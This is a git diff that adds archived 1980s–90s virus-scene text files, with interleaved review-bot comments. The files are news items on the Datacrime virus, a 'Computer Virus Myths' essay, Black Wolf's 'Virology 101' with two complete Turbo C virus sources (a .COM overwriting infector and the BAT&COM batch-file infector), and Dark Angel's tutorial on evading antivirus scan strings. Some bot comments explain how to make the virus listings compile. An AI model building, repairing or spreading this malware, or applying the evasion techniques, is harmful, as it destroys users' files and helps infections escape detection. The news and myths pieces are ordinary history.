+ --Charles Bowen + + + +IBM RELEASING ANTI-VIRUS SOFTWARE + + (Oct. 4) + In a rare move, IBM says it is releasing a program to check for personal +computer viruses in response, in part, to customer worries about a possible +attack next week from the so-called "Datacrime" virus. + "Up until the recent press hype, our customers had not expressed any +tremendous interest (in viruses) over and above what we already do in terms of +security products and awareness," Art Gilbert, IBM's manager of secure systems +industry support, told business writer Peter Coy of The Associated Press. + However, reports of a "Datacrime" virus, rumored to be set to strike MS-DOS +systems, have caused what Coy describes as "widespread alarm," even as many +experts say the virus is rare and a relatively small number of PCs are likely to +be harmed. + IBM says it is releasing its Virus Scanning Program for MS-DOS systems that +can spot three strains of the Datacrime virus as well as more common viruses +that go by names such as the Jerusalem, Lehigh, Bouncing Ball, Cascade and +Brain. + The $35 program is available directly from IBM or from dealers, marketing +representatives and remarketers and, according to Gilbert, will detect but not +eradicate viruses. Gilbert added that installing a virus checker is not a +substitute for safe-computing practices such as making backup copies of programs +and data and being cautious about software of unknown origin. + Meanwhile, virus experts speaking with Coy generally praised IBM's actions. + "It's about time one of the big boys realized what a problem this is and did +something about it," said Ross Greenberg, a New York consultant and author of +Flu-Shot Plus. "To date, all the anti-virus activity is being done by the mom +and pops out there." + In addition, Pamela Kane, president of Panda Systems in Wilmington, Del., and +author of a new book, "Virus Protection," called the move "a very important and +responsible step." 
+ As noted, experts are differing widely over whether there is truly a threat +from the Datacrime virus. The alleged virus -- also dubbed The Columbus Day +virus, because it reportedly is timed to begin working on and after Oct. 12 -- +supposedly cripples MS-DOS- based hard disks by wiping out the directory's +partition table and file allocation table. + Besides the IBM virus scanning software, a number of public domain and +shareware efforts have been contributed online, collected on CompuServe by the +IBM Systems/Utilities Forum (GO IBMSYS). For more details, visit the forum, see +Library 0 and BROwse files with the keyword of VIRUS (as in BRO/KEY:VIRUS). + --Charles Bowen + + + +DUTCH COMPUTERISTS FEAR 'DATACRIME' VIRUS + + (Oct. 7) + The "Datacrime"/Columbus Day virus, which is being widely down-played in the +US, may be much more common in the Netherlands. A Dutch newspaper reported this +week the virus had spread to 10 percent of the personal computers there. + "Those figures are possibly inflated," police spokesman Rob Brons of the Hague +told The Associated Press. Nonetheless, police are doing brisk business with an +antidote to fight the alleged virus. Brons said his department has sold +"hundreds" of $2.35 floppy disks with a program that purportedly detects and +destroys the virus. + As reported, Datacrime has been described as a virus set to destroy data in +MS-DOS systems on or after Oct. 12. AP notes that in the US there have been +fewer than a dozen confirmed sightings of the dormant virus by experts who +disassembled it. + The wire service also quotes Joe Hirst, a British expert on viruses, as saying +some now believe the virus was created by an unidentified Austrian computerist. +He added that as far as he knew the Netherlands was the only European country in +which the virus had been spotted. + --Charles Bowen + \ No newline at end of file 
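Review bot: the added ncsa009.txt text carries several apparent transcription errors that should be corrected or marked verbatim, because the same file elsewhere gives the correct forms. In the NIST item, "worm attack on Internet b9 Jornell University graduate student Robert T. Morris Jr." should read "by Cornell University" (the INTERNET VIRUS BACK? item itself says "a 23-year-old Cornell University student"); that same item opens with a duplicated phrase, "Internet first came to general attention when a came to much of the computing communities attention when", and later has "DoD emplyees". In the Sept. 18 item, "the virus will apparently reformats track 0" and "a toll-free hotline staff by six full-time staff members" are likewise garbled. Separately, the digest is internally inconsistent about the Datacrime trigger date (Oct. 12 in the Sept. 10, Oct. 4 and Oct. 7 items, Oct. 13 in the Sept. 18 item) and about its payload ("reformats track 0 of the hard disk" in the Sept. 10, Sept. 18 and Sept. 22 items versus "wiping out the directory's partition table and file allocation table" in the Oct. 4 item); those come from different wire reports rather than from the transcription, so they should stay as written, but anyone using the file as a reference should be warned that the items do not agree with each other.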
diff --git a/textfiles.com/virus/cvirs.101 b/textfiles.com/virus/cvirs.101 new file mode 100644 index 00000000..3279a6f0 --- /dev/null +++ b/textfiles.com/virus/cvirs.101 
@@ -0,0 +1,250 @@ + Upper-level languages, such as Basic, C, and a multitude of + others, are where most programmers these days feel at home. They + provide users with an amazing amount of built-in functionality, + and allow the programmer to escape from having to deal with the + machine that is being programmed on, and instead focus on the + details of the program design. For viruses, this makes them easy + languages to start in, but there are several obstacles. The first + is that most upper-level languages simply were not made to program + at a base systems level, even in C this is not easy. As a result, + most viruses that are in this genre are primitive [usually + overwriting] in their reproduction mechanism, although their + activation routines can be impressive. Another really important + disadvantage is that high-level languages often create files that + are at the very LEAST 10k and often much higher - not very + efficient for a virus. With this overhead, a memory-resident + virus is impractical as it would usually be noticed by the user + when a rather large chunk of memory disappears for no apparent + reason. + + Another possibility with high-level languages, however, is a + source-code virus. This kind of virus is quite rare (to the best + of my knowledge) but could be very effective. What a source-code + virus does, in short, is search for another source file in the + same language - for example, it might search for all files with a + ".C" extension for C. It would then add its own source code to + the file (often by way of "including" a header with the routines + and placing a call to it in main()) which would execute once the + program was compiled. After compilation, the virus would be more + or less hidden inside the application, and would be dormant until + it found another ".C" file. The only documented case of this that + I know of is Mark Ludwig's virus presented in Computer Virus + Developments Quarterly, Volume 1, Number 2. 
+ + At any rate, all of these viruses have some basic steps in + common. They are: + + 1) Find a file to infect, be it an executable, source, + or whatever (If none found, go to step 3) + 2) Place virus in file. + 3) Decide if any activation routines are met and, if so, + activate. + 4) Return to host or terminate and return to DOS. + + For overwriting viruses, the implementation of these is quite + simple. The only problem with these viruses is that they totally + destroy any program that they infect, making them quite obvious. + The only way to cure these is to find all of the infected files + and delete them, restoring them from backups. The following virus + is an extremely simple overwriting virus written in C. It will + infect all .COM files within the current directory, destroying + them completely. As it infects each file, it will print + "Infecting [FILENAME]" on the screen as a warning. If you compile + it to test it, compile it once, then EXE2BIN it and check the + resultant size. If it does not equal 9504 bytes, change the line + "x=9054;" to the appropriate size value. Do be careful with this + virus, because while it is a primitive one, it will destroy any + .COM files that it hits. + + - - ------ Cut Here ------ - - + /* This is a simple overwriting virus programmed in Turbo C */ + /* It will infect all .COM files in the current directory */ + /* Infections destroy the programs and cannot be cured */ + /* It was presented in Virology 101 (c) 1993 Black Wolf */ + /* FOR EDUCATIONAL PURPOSES ONLY, DO NOT RELEASE! 
*/ + + #include + #include + #include + + FILE *Virus,*Host; + int x,y,done; + char buff[256]; + struct ffblk ffblk; + + main() + { + done = findfirst("*.COM",&ffblk,0); /* Find a .COM file */ + while (!done) /* Loop for all COM's in DIR*/ + { + printf("Infecting %s\n", ffblk.ff_name); /* Inform user */ + Virus=fopen(_argv[0],"rb"); /* Open infected file */ + Host=fopen(ffblk.ff_name,"rb+"); /* Open new host file */ + + x=9504; /* Virus size - must */ + /* be correct for the */ + /* compiler it is made */ + /* on, otherwise the */ + /* entire virus may not*/ + /* be copied!! */ + while (x>256) /* OVERWRITE new Host */ + { /* Read/Write 256 byte */ + fread(buff,256,1,Virus); /* chunks until bytes */ + fwrite(buff,256,1,Host); /* left < 256 */ + x-=256; + } + fread(buff,x,1,Virus); /* Finish off copy */ + fwrite(buff,x,1,Host); + fcloseall(); /* Close both files and*/ + done = findnext(&ffblk); /* go for another one. */ + } + /* Activation would go */ + /* here */ + return (0); /* Terminate */ + } + - - ------ Cut Here ------ - - + + The next virus to be presented is also in C, but is quite a + bit different in functioning than the last. Instead of infecting + executable files by overwriting them, it infects .BAT files by + the directory. When executed, BAT&COM will first search one + directory below the current for batch files. If none are found, + it will try the root directory, then finally the DOS directory. + If it finds any batch files, it will infect all of the batches + in the directory, then check to see if its file has already + been put there. If not, then it will create a file called + BAT&COM containing the virus. On my setup, after EXE2BIN-ing + the file, it came out around 10k. The virus code is as follows: + + The BAT&COM Virus in C + + - - - ---Start Code---- - - - + /* This file is a high-level language virus of a different sort. 
+ It will search out batch files and, when found, place a copy + of itself in the directory with the batch file while adding + instructions in the BAT to execute this new file. In this way, + it will spread each time an "infected" batch is run. + Disinfection is done simply by deleting all of the BAT&COM.COM + files and removing the commands from batch files that ruin + them. This one is NOT confined to the current directory, + so make sure it is on an isolated machine and be sure to + clean up any infections. PLEASE DO NOT RELEASE! + + BAT&COM virus is (C) 1993 Black Wolf Enterprises. + */ + + + #include + #include + #include + #include + + struct ffblk ffblk; + main() + { + char old_dir[MAXPATH]; + Get_Path(old_dir); /* Save the old directory */ + Pick_A_Dir(); /* Find a new directory to */ + Infect_Directory(); /* infect and infect it. */ + chdir(old_dir); /* Return to old directory */ + return 0; + } + + + + Pick_A_Dir() + { + int done; + chdir(".."); /* First, Go out a DIR. */ + done=findfirst("*.BAT",&ffblk,0); /* If no BAT files, try */ + /* root and DOS */ + if (done) + { + chdir("\\"); + done=findfirst("*.BAT",&ffblk,0); + if (done) chdir("\\DOS\\"); + } + return 0; + } + + + Infect_Directory() + { + int done; + + done = findfirst("*.BAT",&ffblk,0); + while (!done) /* Find all .BAT files */ + { /* and add code to run */ + Do_Batch(); /* BAT&COM if not */ + done = findnext(&ffblk); /* already there */ + } + + if (findfirst("BAT&COM.COM",&ffblk,0)) /* If BAT&COM does */ + {Copy_Virus();} /* not exist, then */ + return 0; /* copy it into dir.*/ + } + + + + Do_Batch() + { + FILE *batch; + char Infection_Buffer[12]; + char vpath[MAXPATH]; + + Get_Path(vpath); /* Get path for adding path */ + /* specifier in commands */ + + + if (vpath[3]==0) vpath[2]=0; /* Keep path good in root */ + + batch=fopen(ffblk.ff_name, "rt+"); + fseek(batch, -11, SEEK_END); + fread(Infection_Buffer,11,1,batch); + Infection_Buffer[11]=0; /* Terminate String */ + + if 
(strcmp(Infection_Buffer,"BAT&COM.COM")) /* Check if */ + { /* Batch is */ + fseek(batch, 0, SEEK_END); /* infected.*/ + fprintf(batch,"\n%s\\BAT&COM.COM",vpath); + } /*^- Add command */ + /* to batch */ + + fclose(batch); + return 0; + } + + + Copy_Virus() + { + FILE *old_virus, *new_virus; + int write_length; + char copy_buffer[1024]; /* Copy the virus to */ + /* new directory */ + old_virus=fopen(_argv[0],"rb"); + new_virus=fopen("BAT&COM.COM","wb"); + + write_length=1024; + + while (write_length==1024) + { + write_length=fread(copy_buffer,1,1024,old_virus); + fwrite(copy_buffer,write_length,1,new_virus); + } + fclose(old_virus); + fclose(new_virus); + return 0; + } + + + Get_Path(char *path) + { + strcpy(path, "A:\\"); + path[0] ='A' + getdisk(); /* Returns current path */ + getcurdir(0, path+3); + return 0; + } + - - - ---End of Code---- - - - + + + \ No newline at end of file diff --git a/textfiles.com/virus/cvm.txt b/textfiles.com/virus/cvm.txt new file mode 100644 index 00000000..0bbec1a9 --- /dev/null +++ b/textfiles.com/virus/cvm.txt 
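Review bot: (on the cvirs.101 hunk above) the two C listings will not compile as pasted because every #include directive has lost its header name; the calls they use (fopen/fread/fwrite/fprintf/fseek, findfirst/findnext and struct ffblk, getdisk/getcurdir and MAXPATH, strcpy/strcmp, fcloseall and _argv) are Turbo C's stdio.h, dir.h, dos.h and string.h, so the file should either restore those names or note that they were dropped in transcription. The prose and the first listing also disagree on the size constant: the text says "If it does not equal 9504 bytes, change the line "x=9054;"" while the code reads "x=9504;", and one of the two should be fixed. Two behavioural caveats are worth recording beside the BAT&COM listing: Do_Batch opens the batch file with "rt+" and then calls fseek(batch, -11, SEEK_END), but on a text-mode stream the C standard only defines fseek for offsets previously returned by ftell, so the marker check depends on Turbo C's text-mode seek behaviour rather than on portable C; and because that check only compares the last 11 bytes against "BAT&COM.COM", it matches only while the file ends exactly in the line the virus appended with no trailing newline, so any later edit that adds a trailing CR/LF (as most editors do) causes the same batch file to be infected again on the next run, and a batch file shorter than 11 bytes makes the negative seek fail and the comparison read from an undefined position.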
@@ -0,0 +1,449 @@ + + + + + + + Computer Virus Myths + + by Rob Rosenberger + with Ross Greenberg + + + A number of myths have popped up recently about the threat + of computer "viruses". There are myths about how widespread they + are, how dangerous they are, and even myths about what a computer + virus really is. We'd like the facts to be known. + + The first thing you have to understand is that a virus is a + programming technique that falls in the realm of "Trojan horses." + All viruses are Trojan horses, but very few Trojan horses can be + called a virus. + + That having been said, it's time to go over the terminology + we use when we lecture: + + BBS Bulletin Board System. If you have a modem, you + can call a BBS and leave messages, transfer com- + puter files back & forth, and learn a lot about + computers. (What you're reading right now most + likely came to you from a BBS, for example.) + + Bug an accidental flaw in the logic of a computer + program that makes it do things it shouldn't + really be doing. Programmers don't mean to put + bugs in their program, but they always creep in. + The first bug was discovered by pioneer Grace + Hopper when she found a dead moth shorting out a + circuit in the early days of computers. Pro- + grammers tend to spend more time debugging their + programs than they do writing them in the first + place. + + Hacker someone who really loves computers and who wants + to push them to the limit. Hackers don't release + Trojan horses onto the world, it's the wormers who + do that. (See the definition for a "wormer".) + Hackers have a healthy sense of curiosity: they + try doorknobs just to see if they're locked, and + they tinker with a piece of equipment until it's + "just right." + + Shareware a distribution method for quality software avail- + able on a "try before you buy" basis. You pay for + the program only if you find it useful. 
Shareware + programs can be downloaded from BBSs and you are + encouraged to give an evaluation copy to friends. + There are few advertising & distribution costs, so + many shareware applications can rival the power of + off-the-shelf counterparts, at just a fraction of + the price. + + + + Copyright (c) 1988 Rob Rosenberger & Ross Greenberg Page 1 + + + + + + + Trojan horse a generic term describing a set of computer + instructions purposely hidden inside a program. + Trojan horses tell a program to do things you + don't expect it to do. The term comes from a + historic battle in which the ancient city of Troy + was offered the "gift" of a large wooden horse + that secretly held soldiers in its belly. The + Trojans rolled it into their fortified city.... + + Virus a term for a very specialized Trojan horse that + can spread to other computers by secretly + "infecting" programs with a copy of itself. A + virus is the only type of Trojan horse which is + contagious, like the common cold. If it doesn't + meet this definition, then it isn't a virus. + + Worm a term similar to a Trojan horse, but there is no + "gift" involved. If the Trojans had left that + wooden horse outside the city, they wouldn't have + been attacked -- but worms can bypass your + defenses. An example is an unauthorized program + designed to spread itself by exploiting a bug in a + network software package. (Such programs could + possibly also contain a virus that activates when + it reaches the computer.) Worms are usually + released by someone who has normal access to the + computer or network. + + Wormers the name given to the people who unleash + destructive Trojan horses. Let's face it, these + people aren't angels. What they do hurts us. + They deserve our disrespect. + + Viruses, like all Trojan horses, are purposely designed to + make a program do things you don't expect it to do. Some viruses + are just an annoyance, perhaps only displaying a "Peace on earth" + message. 
The viruses we're worried about are the ones designed + to destroy your files and waste the valuable time you'll spend to + repair the damage. + + Now you know the difference between a virus and a Trojan + horse and a bug. Let's get into some of the myths: + + All purposely destructive code comes as a virus. + Wrong. Remember, "Trojan horse" is the general term for + purposely destructive code. Very few Trojan horses are actually + viruses. + + All Trojan horses are bad. + Believe it or not, there are a few useful Trojan horse tech- + niques in the world. A "side door" is any command not documented + in the user manual, and it's a Trojan horse by definition. Some + programmers install side doors to help them locate bugs in their + + + + + Computer Virus Myths Page 2 + + + + + + + programs. Sometimes a command may have such an obscure function + that it makes sense not to document it. + + Viruses and Trojan horses are a recent phenomenon. + Trojan horses have been around since the first days of the + computer. Hackers toyed with viruses in the early 1960s as a + form of amusement. Many different Trojan horse techniques were + developed over the years to embezzle money, destroy data, etc. + The general public wasn't aware of this problem until the IBM PC + revolution brought it into the spotlight. Just five years ago, + banks were still covering up computerized embezzlements because + they believed they'd lose too many customers. + + Computer viruses are reaching epidemic proportions. + Wrong again. Viruses may be spread all over the planet but + they aren't taking over the world. There are only about fifty or + so known virus "strains" at this time and a few of them have been + completely eliminated. Your chances of being infected are slim + if you take proper precautions. (Yes, it's still safe to turn on + your computer!) + + Viruses could destroy all the files on my disks. + Yes, and a spilled cup of coffee will do the same thing. 
If + you have adequate backup copies of your data, you will be able to + recover from a virus/coffee attack. Backups mean the difference + between a nuisance and a disaster. + + Viruses have been documented on over 300,000 computers. + This statistic comes from John McAfee, a self-styled virus + fighter who seems to come up with all the quotes the media love + to hear. We assume it includes every floppy disk ever infected + by a virus, as well as all of the computers participating in the + Christmas worm attack. (That worm was designed for a particular + IBM network software package; it never infected the computers. + Therefore, it wasn't a virus. The Christmas worm attack can't be + included in virus infection statistics.) Most of the media don't + understand computer crimes, so they tend to call almost anything + a virus. + + Viruses can be hidden inside a data file. + Data files can't wreak havoc on your computer -- only an + executable program can do that. If a virus were to infect a data + file, it would be a wasted effort. + + Most BBSs are infected with viruses. + Here's another scary myth drummed up in the big virus panic. + Very few BBSs are really infected. (If they are infected, they + won't be around for long!) It's possible a dangerous file could + be available on a BBS, but that doesn't mean the BBS itself is + infected. + + + + + + + + Computer Virus Myths Page 3 + + + + + + + BBSs and shareware programs spread viruses. + "The truth," says PC Magazine publisher Bill Machrone, "is + that all major viruses to date were transmitted by commercial + packages and private mail systems, often in universities." The + Peace virus, for example, made its way into a commercial software + product sold to thousands of customers. Machrone goes on to say + that "bulletin boards and shareware authors work extraordinarily + hard at policing themselves to keep viruses out." 
Many reputable + sysops check all new files for Trojan horses; nationwide sysop + networks help spread the word about dangerous files. You should + be careful about software that comes from friends & BBSs, that's + definitely true -- but you must also be careful with the software + you buy at computer stores. The Peace virus proves it. + + My computer could be infected if I call an infected BBS. + BBSs can't write information on your disks -- that's handled + by the communications software you use. You can only transfer a + dangerous file if you let your software do it. (In rare cases, a + computer hooked into a network could be sent a dangerous file or + directly infected, but it takes specialized software to connect a + computer into a network. BBSs are NOT networks.) + + My files are damaged, so it must have been a virus attack. + It could also have been caused by a power flux, or static + electricity, or a fingerprint on a floppy disk, or a bug in your + software, or perhaps a simple error on your part. Power failures + and spilled cups of coffee have destroyed more data than all the + viruses combined. + + Donald Burleson was convicted of releasing a virus. + A recent Texas computer crime trial was hailed all over the + country as a "virus" trial. Donald Burleson was in a position to + release a complex, destructive worm on his employer's mainframe + computer. This particular worm wasn't able to spread itself to + other computers, so it wasn't a virus. The prosecuting attorney, + Davis McCown, claims he "never brought up the word virus" during + the trial. So why did the media call it a virus? + 1. David Kinney, an expert witness testifying for the defense + (oddly enough), claimed he believed Burleson unleashed a + virus. This is despite the fact that the programs in + question had no capability to infect other systems. 
The + prosecuting attorney didn't argue the point and we don't + blame him -- Kinney's bizarre claim on the witness stand + probably helped sway the jury to convict Burleson, and it + was the defense's fault for letting him testify. + 2. McCown doesn't offer reporters a definition for the word + virus. He gives the facts behind the case and lets the + reporters deal with the definitions. The Associated Press + and USA Today, among others, used such vague terms that + any program could be called a virus. If we applied their + definitions in the medical world, we could safely claim + penicillin is a biological virus (which is absurd). + + + + + + Computer Virus Myths Page 4 + + + + + + + 3. McCown claims many of the quotes attributed to him "are + misleading or fabricated" and identified one in particular + which "is total fiction." Reporters occasionally print a + quote out of context, and McCown apparently fell victim to + it. (It's possible a few bizarre quotes from David Kinney + or John McAfee were accidentally attributed to McCown.) + + Robert Morris Jr. released a benign virus on a defense network. + It may have been benign, but it wasn't a virus in the strict + technical sense. Morris, the son of a chief scientist for the + National Security Agency, allegedly became bored and decided to + take advantage of a tiny bug in the Defense Department's network + software. (We say "alleged" because Morris hadn't been charged + with a crime when we went to press.) That tiny bug let him send + a worm through the network and have it execute when it reached + certain computers. Among other things, Morris's "Internet" worm + was able to tell some computers to send copies of itself to other + computers in the network. The network became clogged in a matter + of hours. The media called the Internet worm a "virus" (like it + called the Christmas worm a virus) because it was able to spread + itself to other computers. 
But it didn't infect those computers, + so it can't be called a virus. (We can't really fault the press + for calling it one, though. It escapes the definition of a virus + because of a technicality.) A few notes: + 1. This worm worked only on Sun-3 & Vax computers with a UNIX + operating system that was linked to the Internet network; + 2. The 6,200 affected computers should not be counted in any + virus infection statistics (they weren't infected); + 3. Yes, Morris could easily have added some infection code to + make it a worm/virus if he'd had the urge; and, + 4. The network bug Morris exploited has since been fixed. + + Viruses can spread to all sorts of computers. + All Trojan horses are limited to a family of computers, and + this is especially true for viruses. A virus designed to spread + on IBM PCs cannot infect an IBM 4300-series mainframe, nor can it + infect a Commodore C64, nor can it infect an Apple MacIntosh. + + My backup disks will be destroyed if I back up a virus. + No, they won't. Let's suppose a virus does get backed up + with your other files. Backups are just a form of data, and data + can't harm your system. You can recover the important files from + your backups without triggering the virus. + + Anti-virus software will protect me from viruses. + Anti-virus packages offer some good front-line protection, + but they can be tricky to use at times. You could make a crucial + mistake in deciding whether to let a "flagged" event take place. + Also, Trojan horses can be designed to take advantage of holes in + your defense. + + + + + + + + Computer Virus Myths Page 5 + + + + + + + Copy-protected software is safe from an attack. + This is totally wrong. Copy-protected software is the most + vulnerable software in a Trojan horse attack. You may have big + problems trying to use or re-install such software, especially if + the master disk was attacked. 
It should also be noted that copy- + protection schemes rely on extremely tricky techniques which have + occasionally "blown up" on users. Some people mistakenly believe + they were attacked by a clever virus. + + Viruses are written by hackers. + Yes, hackers have written viruses -- just to see how they + operate. But they DON'T unleash them to an unsuspecting public. + Wormers are the ones who do that. (You can think of a wormer as + a hacker who was seduced by the Dark Side of The Force.) Hackers + got a bum rap when the press corrupted the name. + + + We hope this dispels the myths surrounding the virus scare. + Viruses DO exist, many of them will cause damage, and all of them + can spread to other computers. But you can defend yourself from + an attack if you keep a cool head and a set of backups. + + The following guidelines can shield you from Trojan horses + and viruses. They will lower your chances of being attacked and + raise your chances of recovering from one. + + 1. Download files only from reputable BBSs where sysops check + every program for Trojan horses. If you're still afraid, + consider getting your programs from a BBS or "disk vendor" + company which gets its programs directly from the author; + + 2. Let a newly uploaded file "mature" on a BBS for one or two + weeks before you download it (others will put it through + its paces). + + 3. Set up a procedure to regularly back up your files, and + follow it religiously. Consider purchasing a user- + friendly backup program that takes the drudgery out of + backing up your files. + + 4. Rotate between two sets of backups for better security + (use set #1, then set #2, then set #1...). + + 5. Consider using a program which will create a unique + "signature" of all the programs on your computer. Once in + a while, you can run this program to determine if any of + your applications have been modified -- either by a virus + or by a stray gamma ray. + + 6. 
If your computer starts acting weird, DON'T PANIC. It may + be a virus, but then again it may not. Immediately reboot + from a legitimate copy of your master DOS disk. Put a + write-protect tab on that disk just to be safe. Do NOT + run any programs on your regular disks (you might activate + + + + Computer Virus Myths Page 6 + + + + + + + a Trojan horse). If you don't have adequate backups, try + to bring them up to date. Yes, you might be backing up a + virus as well, but it can't hurt you as long as you don't + run any of your normal programs. Set your backups off to + the side. Only then can you safely hunt for the problem. + + 7. If you can't figure out what's wrong with your computer, + and you aren't sure of yourself, just turn it off and call + for help. Consider calling a local computer group before + you hire an expert to fix your problem. If you need a + professional, consider hiring a regular computer consul- + tant before you call on a "virus expert." + + 8. If you can't figure out what's wrong with your computer, + and you are sure of yourself, execute a low-level format + on all of your regular disks (you can learn how to do it + from almost any BBS), then do a high-level format on each + one of them. Next, carefully re-install your software + from legitimate copies of the master disks, not from the + backups. Then, carefully restore only the data files (not + the executable program files!) from your backup disks. + + If you DO find a Trojan horse or a virus, we'd appreciate it + if you'd mail a copy to us. (But please, don't handle one unless + you know what you're doing.) Include as much information as you + can, and put a label on the disk that says it contains a Trojan + horse or virus. Send it to Ross Greenberg, 594 Third Avenue, New + York, NY 10016. Thank you. + + ------------------------------------------------------- + Ross Greenberg is the author of a popular Trojan/virus + detection program. 
Rob Rosenberger is the author of a + modem analysis program. These men have never met in + person; they worked on this story completely by modem. + ------------------------------------------------------- + + Copyright (c) 1988 Rob Rosenberger & Ross Greenberg + + + You may give copies of this to anyone if you pass it along in its + entirety. Publications must obtain written permission to reprint + this article. Write to Rob Rosenberger, P.O. Box #643, O'Fallon, + IL 62269. + + + + + + + + + + + + + + + Computer Virus Myths Page 7 +  \ No newline at end of file diff --git a/textfiles.com/virus/datut001.txt b/textfiles.com/virus/datut001.txt new file mode 100644 index 00000000..9a6e5991 --- /dev/null +++ b/textfiles.com/virus/datut001.txt 
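Review bot: the Computer Virus Myths file is imported with a stray non-printing byte on its last line and without a trailing newline (the hunk closes with "\ No newline at end of file"), whereas datut001.txt and datut002.txt in the same patch end cleanly; if the import is not meant to be byte-for-byte verbatim, drop the stray byte and add the final newline. The article also carries its own date context (the "Copyright (c) 1988" line), so several of its claims, for instance that only an executable program can do harm and that a data file cannot carry a virus, should be read as period statements; a short README in the directory saying these are archival texts would help readers who land on this file first.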
@@ -0,0 +1,145 @@ + + + SCAN STRINGS, HOW THEY WORK, + AND HOW TO AVOID THEM + + By Dark Angel + + + Scan strings are the scourge of the virus author and the friend of anti- + virus wanna-bes. The virus author must find encryption techniques which + can successfully evade easy detection. This article will show you several + such techniques. + + Scan strings, as you are well aware, are a collection of bytes which an + anti-viral product uses to identify a virus. The important thing to keep + in mind is that these scan strings represent actual code and can NEVER + contain code which could occur in a "normal" program. The trick is to use + this to your advantage. + + When a scanner checks a file for a virus, it searches for the scan string + which could be located ANYWHERE IN THE FILE. The scanner doesn't care + where it is. Thus, a file which consists solely of the scan string and + nothing else would be detected as infected by a virus. A scanner is + basically an overblown "hex searcher" looking for 1000 signatures. + Interesting, but there's not much you can do to exploit this. The only + thing you can do is to write code so generic that it could be located in + any program (by chance). Try creating a file with the following debug + script and scanning it. This demonstrates the fact that the scan string + may be located at any position in the file. + + --------------------------------------------------------------------------- + + n marauder.com + e 0100 E8 00 00 5E 81 EE 0E 01 E8 05 00 E9 + + rcx + 000C + w + q + + --------------------------------------------------------------------------- + + Although scanners normally search for decryption/encryption routines, in + Marauder's case, SCAN looks for the "setup" portion of the code, i.e. + setting up BP (to the "delta offset"), calling the decryption routine, and + finally jumping to program code. 
+ + What you CAN do is to either minimise the scannable code or to have the + code constantly mutate into something different. The reasons are readily + apparent. + + The simplest technique is having multiple encryption engines. A virus + utilising this technique has a database of encryption/decryption engines + and uses a random one each time it infects. For example, there could be + various forms of XOR encryption or perhaps another form of mathematical + encryption. The trick is to simply replace the code for the encryption + routine each time with the new encryption routine. + + Mark Washburn used this in his V2PX series of virii. In it, he used six + different encryption/decryption algorithms, and some mutations are + impossible to detect with a mere scan string. More on those later. + + Recently, there has been talk of the so-called MTE, or mutating engine, + from Bulgaria (where else?). It utilises the multiple encryption engine + technique. Pogue Mahone used the MTE and it took McAfee several days to + find a scan string. Vesselin Bontchev, the McAfee-wanna-be of Bulgaria, + marvelled the engineering of this engine. It is distributed as an OBJ file + designed to be able to be linked into any virus. Supposedly, SCANV89 will + be able to detect any virus using the encryption engine, so it is worthless + except for those who have an academic interest in such matters (such as + virus authors). + + However, there is a serious limitation to the multiple encryption + technique, namely that scan strings may still be found. However, scan + strings must be isolated for each different encryption mechanism. An + additional benefit is the possibility that the antivirus software + developers will miss some of the encryption mechanisms so not all the + strains of the virus will be caught by the scanner. + + Now we get to a much better (and sort of obvious) method: minimising scan + code length. 
There are several viable techniques which may be used, but I + shall discuss but three of them. + + The one mentioned before which Mark Washburn used in V2P6 was interesting. + He first filled the space to be filled in with the encryption mechanism + with dummy one byte op-codes such as CLC, STC, etc. As you can see, the + flag manipulation op-codes were exploited. Next, he randomly placed the + parts of his encryption mechanism in parts of this buffer, i.e. the gaps + between the "real" instructions were filled in with random dummy op-codes. + In this manner, no generic scan string could be located for this encryption + mechanism of this virus. However, the disadvantage of this method is the + sheer size of the code necessary to perform the encryption. + + A second method is much simpler than this and possibly just as effective. + To minimise scan code length, all you have to do is change certain bytes at + various intervals. The best way to do this can be explained with the + following code fragment: + + mov si, 1234h ; Starting location of encryption + mov cx, 1234h ; Virus size / 2 + variable number + loop_thing: + xor word ptr cs:[si], 1234h ; Decrypt the value + add si, 2 + loop loop_thing + + In this code fragment, all the values which can be changed are set to 1234h + for the sake of clarity. Upon infection, all you have to do is to set + these variable values to whatever is appropriate for the file. For + example, mov bx, 1234h would have to be changed to have the encryption + start at the wherever the virus would be loaded into memory (huh?). Ponder + this for a few moments and all shall become clear. To substitute new + values into the code, all you have to do is something akin to: + + mov [bp+scratch+1], cx + + Where scratch is an instruction. The exact value to add to scratch depends + on the coding of the op-code. Some op-codes take their argument as the + second byte, others take the third. 
Regardless, it will take some + tinkering before it is perfect. In the above case, the "permanent" code is + limited to under five or six bytes. Additionally, these five or six bytes + could theoretically occur in ANY PROGRAM WHATSOEVER, so it would not be + prudent for scanners to search for these strings. However, scanners often + use scan strings with wild-card-ish scan string characters, so it is still + possible for a scan string to be found. + + The important thing to keep in mind when using this method is that it is + best for the virus to use separate encryption and decryption engines. In + this manner, shorter decryption routines may be found and thus shorter scan + strings will be needed. In any case, using separate encryption and + decryption engines increases the size of the code by at most 50 bytes. + + The last method detailed is theft of decryption engines. Several shareware + products utilise decryption engines in their programs to prevent simple + "cracks" of their products. This is, of course, not a deterrent to any + programmer worth his salt, but it is useful for virus authors. If you + combine the method above with this technique, the scan string would + identify the product as being infected with the virus, which is a) bad PR + for the company and b) unsuitable for use as a scan string. This technique + requires virtually no effort, as the decryption engine is already written + for you by some unsuspecting PD programmer. + + All the methods described are viable scan string avoidance techniques + suitable for use in any virus. After a few practice tries, scan string + avoidance should become second nature and will help tremendously in + prolonging the effective life of your virus in the wild. diff --git a/textfiles.com/virus/datut002.txt b/textfiles.com/virus/datut002.txt new file mode 100644 index 00000000..149498f3 --- /dev/null +++ b/textfiles.com/virus/datut002.txt 
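Review bot: in datut001.txt the paragraph under the decryptor fragment says "mov bx, 1234h would have to be changed" to the load address, but the fragment sets its pointer with `mov si, 1234h` and decrypts through `cs:[si]`; there is no BX in the loop, so either the register in the prose or in the fragment is wrong, and the patch-up example `mov [bp+scratch+1], cx` is ambiguous about which of the three `1234h` immediates it targets (the parenthetical "(huh?)" suggests the author noticed). Naming the instruction explicitly, e.g. `scratch: mov si, 1234h`, would make the relation between the fragment and the patch-up code unambiguous. Minor: the debug script writes 12 bytes and `rcx 000C` matches, so that part is consistent.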
